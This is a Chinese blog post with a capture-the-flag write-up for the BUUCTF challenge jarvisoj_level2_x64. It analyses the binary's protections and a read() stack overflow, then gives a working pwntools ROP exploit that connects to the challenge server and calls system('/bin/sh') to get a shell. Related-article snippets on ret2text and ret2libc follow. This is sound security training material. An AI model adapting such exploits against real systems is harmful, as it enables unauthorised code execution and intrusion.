pwn刷题num32----ret2text

最新推荐文章于 2024-01-31 19:53:31 发布
最新推荐文章于 2024-01-31 19:53:31 发布
阅读量467 收藏
点赞数 1
分类专栏: BUUCTF pwn CTF 文章标签: 系统安全 网络安全 c语言 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/124460724
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
CTF
61 篇文章 1 订阅
订阅专栏
BUUCTF
36 篇文章 0 订阅
订阅专栏

BUUCTF-PWN-jarvisoj_level2_x64

在这里插入图片描述
首先查保护–>看链接类型–>赋予程序可执行权限–>试运行在这里插入图片描述

64位程序,小端序
未开启RELRO-----got表可写
未开启canary保护-----存在栈溢出
开启NX保护-----堆栈不可执行
未开启PIE-----程序地址为真实地址
动态链接

ida一下看一下主函数
在这里插入图片描述
看一下 vulnerable_function();函数
在这里插入图片描述
栈溢出,read函数读入0x200字节放在buf处,而buf只有0x80字节大小,可以覆盖返回地址
看一下栈区
在这里插入图片描述
在这里插入图片描述
buf距离返回地址(r)0x88字节(0x80+0x8)
看一下程序发现没有后门函数,不过有system函数(地址0x4004C0)
在这里插入图片描述
找一下字符串/bin/sh地址(0x600A90)
在这里插入图片描述
exp

from pwn import *
context(os = 'linux',log_level = 'debug',endian = 'little',arch = 'amd64')
sh = remote('node4.buuoj.cn',29533)
system_addr = 0x4004C0
bin_sh_addr = 0x600A90
pop_rdi_ret_addr = 0x4006b3
payload = flat(['a' * 0x88,pop_rdi_ret_addr,bin_sh_addr,system_addr])
sh.sendline(payload)
sh.interactive()

运行获得shell
在这里插入图片描述
在这里插入图片描述

tbsqigongzi
关注
专栏目录
ret2text知识点及例题
weixin_44864859的博客
05-19 1431
ret2text 这里涉及到的知识 Stack: No canary found NX: NX enabled ret2text: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked 1.首先是stack保护措施,如果开启的话在栈中返回地址前放一个随机值,如果被覆盖,程序就会报错退出 2.nx则是 no execution,如果开启的话就不能让ip寄存器指向堆和栈。。。。注意堆和栈是不
PWN基础16:Ret2Libc 32位实例
prettyX的博客
07-21 1159
这节我们研究的源码 //L16.c #include <stdio.h> char buf2[10]="ret2libc is good"; void vul() { char buf[10]; gets(buf); } void main() { write(1,"hello",5); vul(); }
浅谈 ret2text
akdelt的博客
01-21 1223
而此时栈顶指针指向 ‘/bin/sh’ 的地址,于是 ‘/bin/sh’ 被放入 rdi 中,然后执行 ret,此时后门函数地址顶上来了,于是就 ret 到了 func 的地址 (这就是为什么找的是pop rdi;我瞎猜的,不然不好解释)而拿去参数也是同过 EBP 偏移量来实现的,本来有返回地址时通过 [EBP+8] 来拿参数一,但是因为没有返回地址 此时 EBP 和 参数相邻相差 4 个字节,所以 EBP + 8 就不是参数一的地址了。前六个参数依次存放于rdi,rsi,rdx,rcx,r8,r9中。
基本ROP之ret2text
至臻求学,胸怀云月
01-12 1382
(IDA分析存在错误,抠了一天终于在大佬的帮助下抠出来了) 背景 当程序开启NX保护之后,直接向栈或堆上注入代码的方式难以发挥效果(数据页不执行操作) 提出绕过操作: ROP(Return Oriented Programming) 主要思想是:在栈缓冲区溢出的基础上,利用程序中已有的小片段(gadgets),来改变寄存器或者变量的值,从而控制程序的执行流程。 所谓 gadgets 就是以 ret...
PWN · ret2text & 格式化字符串漏洞 | NX | Canary | PIE】[深育杯 2021]find_flag
Mr_Fmnwon的博客
06-09 2388
Canary、PIE开启,如何进行绕过呢?【PWN · ret2text | PIE 】[NISACTF 2022]ezpie_Mr_Fmnwon的博客-CSDN博客【PWN · ret2libc | Canary】[2021 鹤城杯]littleof_Mr_Fmnwon的博客-CSDN博客而本题也无外乎这两个要点,然而还是让本蒟蒻感到头疼QAQ(一点睡,六点半起,一整个学期伤身体,ICU里喝小米)本题是遇到的第一道保护全开的题目,各种保护让人头大,对各种漏洞的综合利用也有更高的要求,加油!
pwn小白入门03---ret2text
weixin_45943522的博客
02-21 6669
什么是栈溢出: 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变(比如gets函数,他不会去验证你输入的值的长度,通过这个函数,你可以往一个本身大小为4字节的数组中填入任意大小的数据,如果填入8字节的数据,将会导致栈溢出,进而程序报错)。就像是往杯子里倒水,水满了溢出来最后烫到你一样。 最简单的栈溢出利用:ret2text 通过栈溢出修改call指令保存在栈上的返回地址(eip的值),这样cpu执行ret指令的时候,就会将被修改的值从栈上取
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
BUUCTF-pwn刷题记录(22-7-30更新)
Morphy_Amo的博客
03-04 4380
BUUCTF刷题记录
谷歌师兄的leetcode刷题笔记-Pwn-Pad-Arsenal-Tools:适用于Android设备的渗透测试应用
06-30
谷歌师兄的leetcode刷题笔记Pwn Pad 阿森纳工具 大家好, 我正在使用 Pwn Pad 2013(适用于 2012 版 Nexus 7 平板电脑)。 这是我最喜欢的 Android 应用程序列表以及一些 .sh 和 .apk 源和链接。 希望它会对某人有所...
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8419
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
pwn学习day4——ret2text
qq_44657899的博客
06-29 571
覆盖函数返回地址到程序内存在的gadgets获取shell。找到hint函数地址就可以解出题目了,但是打死都不行。gdb断点至scanf函数处,也没看出来哪里出现了问题。32位这里遇到个问题,按理来说覆盖长度为。直接溢出至hint函数处即可。问大佬说是因为需要绕过ecx。
pwn刷题num28---ret2text
tbsqigongzi的博客
04-27 299
BUUCTF-PWN- jarvisoj_level2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下主函数 看一下 vulnerable_function();函数 栈溢出,read函数读入0x100字节放在buf处,而buf只有0x88字节大小,可以覆盖返回地
pwn笔记 - ret2text - 函数传参(x86&x64)
weixin_44227244的博客
09-06 4177
pwn笔记 - ret2text - 函数传参
ret2text涉及到的堆栈平衡问题
qq_41560595的博客
01-04 4699
这个指令要求rsp+0x40的值是16字节对齐。 错误的题解: from pwn import * io=process("./level0") raw_input() elf=ELF("./level0") system_addr=0x400596 io.recvuntil(b"World\n") payload=b"A"*(0x88)+p64(system_addr) io.send(payload) io.interactive() $rsp+0x40没有16字节对齐。 正确的题解: fro.
pwn-栈溢出】— ret2text
weixin_43988488的博客
03-19 843
使用checksec检查程序的架构以及保护情况寻找程序漏洞函数,比如如gets,scanf等计算目标变量的在堆栈中与栈底(32:ebp,64:rbp)的之间偏移查看程序导入表,观察表中是否已导入可利用的函数,比如system,execve等分析是否有字符串/bin/sh,将它作为system的参数在此程序中,它直接提供一个后门函数,供我们使用。
二进制漏洞挖掘之ret2text栈溢出
最新发布
brucexia的专栏
01-31 734
(2)执行“gcc -m32 -fno-stack-protector ret2text.c -o ret2text”命令,编译程序,再使用gdb调试程序,使程序运行到read函数,执行“cyclic 200”命令,生成200个字符。执行“python ret2text.py”命令,运行脚本,获取系统shell,再执行“ls”命令,测试shell能否正常使用,结果如图11-32所示。由图可知,ebp地址存储的字符为“eaaa”,执行“cyclic -l eaaa”,结果如图11-30所示。
ROP初探之ret2text
chlet的博客
05-05 589
ROP即返回导向编程是一种计算机安全利用技术,它允许攻击者在存在诸如可执行空间保护和代码签名等安全防御的情况下执行代码。在这种技术中,攻击者通过控制调用栈来劫持程序控制流,并执行机器内存中已存在的精心选择的机器指令序列,称为“gadgets”。每个gadgets通常以返回指令结束,并位于现有程序和/或共享库代码中的子程序内。这些gadgets串联在一起,允许攻击者在使用阻止更简单攻击的防御的机器上执行任意操作。
PWN · ret2text | PIE 】[NISACTF 2022]ezpie
Mr_Fmnwon的博客
05-31 2210
所接触的PIE保护的第一题,也非常简单。随着刷题的深入,各种保护的开启肯定是免不了的,对此多做总结,总是好的。
PWN · IntegerOverflow & ret2text】[BJDCTF 2020]babystack2.0
Mr_Fmnwon的博客
05-27 1155
整数溢出漏洞——对于有/无符号数,长/短位宽转换时机器码的变换策略所指。整数溢出一般与其他堆栈溢出相结合,然而其中的内容其实远不止这些,还需要深层次刷题,进一步掌握了解整数溢出。
Struts-Pwn工具:探测和利用Apache Struts CVE-2017-5638漏洞
struts-pwn工具要求使用Python 2或Python 3版本的Python解释器。在使用该工具时,应严格遵守法律和道德标准,仅在授权的情况下使用此工具进行安全测试和漏洞评估,不可用于非法攻击或入侵他人的计算机系统。 #### ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值